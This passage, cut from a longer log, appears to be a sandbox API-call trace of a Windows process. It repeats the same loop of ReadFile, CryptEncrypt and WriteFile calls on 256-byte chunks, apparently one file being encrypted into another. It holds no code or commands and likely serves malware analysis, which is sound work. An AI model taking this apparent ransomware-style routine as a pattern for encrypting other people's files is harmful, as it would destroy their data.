lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.417] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.417] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.417] GetLastError () returned 0x0 [0172.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.417] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.417] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.417] GetLastError () returned 0x0 [0172.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.417] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.417] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.417] GetLastError () returned 0x0 [0172.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.417] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.417] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.417] GetLastError () returned 0x0 [0172.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.418] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.418] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.418] GetLastError () returned 0x0 [0172.418] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.418] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.418] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.418] GetLastError () returned 0x0 [0172.418] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.418] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.418] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.418] GetLastError () returned 0x0 [0172.418] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.418] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.418] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.418] GetLastError () returned 0x0 [0172.418] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.418] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.418] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.418] GetLastError () returned 0x0 [0172.418] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.418] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.418] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.418] GetLastError () returned 0x0 [0172.418] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.419] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.419] GetLastError () returned 0x0 [0172.419] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.419] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.419] GetLastError () returned 0x0 [0172.419] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.419] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.419] GetLastError () returned 0x0 [0172.419] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.419] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.419] GetLastError () returned 0x0 [0172.419] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.419] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.419] GetLastError () returned 0x0 [0172.419] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.419] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.419] GetLastError () returned 0x0 [0172.419] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.419] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.419] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.420] GetLastError () returned 0x0 [0172.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.420] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.420] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.420] GetLastError () returned 0x0 [0172.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.420] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.420] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.420] GetLastError () returned 0x0 [0172.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.420] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.420] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.420] GetLastError () returned 0x0 [0172.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.420] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.420] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.420] GetLastError () returned 0x0 [0172.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.420] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.420] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.420] GetLastError () returned 0x0 [0172.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.420] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.420] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.420] GetLastError () returned 0x0 [0172.420] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.421] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.421] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.421] GetLastError () returned 0x0 [0172.421] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.421] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.421] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.421] GetLastError () returned 0x0 [0172.421] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.421] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.421] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.421] GetLastError () returned 0x0 [0172.421] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.421] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.421] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.421] GetLastError () returned 0x0 [0172.421] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.421] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.421] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.421] GetLastError () returned 0x0 [0172.421] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.421] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.421] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.421] GetLastError () returned 0x0 [0172.421] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.421] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.422] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.422] GetLastError () returned 0x0 [0172.422] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.422] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.422] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.422] GetLastError () returned 0x0 [0172.422] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.422] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, 